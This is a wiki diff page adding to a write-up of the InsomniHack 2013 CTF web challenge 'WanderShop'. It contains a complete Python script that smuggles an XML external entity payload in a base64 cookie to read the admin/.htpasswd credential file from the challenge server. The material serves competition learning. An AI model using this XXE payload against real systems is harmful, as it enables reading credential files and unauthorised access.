Changes

Jump to: navigation, search

InsomniHack-2013/Web2/WanderShop

462 bytes added, 11:02, 26 March 2013
>slamas (admin)
* The flag is in the admin page
 
* Complete script
<pre>
#!/usr/bin/env python
 
import requests, urllib2, base64
 
url = 'http://web02.insomni.hack/1a5b4e6f811a0bc0dcb8fdd773bdb51c571be4e6/'
payload='''
<!DOCTYPE basket
[
<!ENTITY item SYSTEM "admin/.htpasswd">
]>
<basket>
<item type="5" name="asd">&item;</item>
</basket>
'''
 
payload = urllib2.quote(base64.encodestring(payload))
 
cookie = {'basket': payload}
r = requests.get(url + 'checkout.php', cookies=cookie)
print r.content
</pre>
Rorist
ControlGroup, administrator
4,210
edits
Retrieved from "https://fixme.ch/wiki/Special:MobileDiff/4132"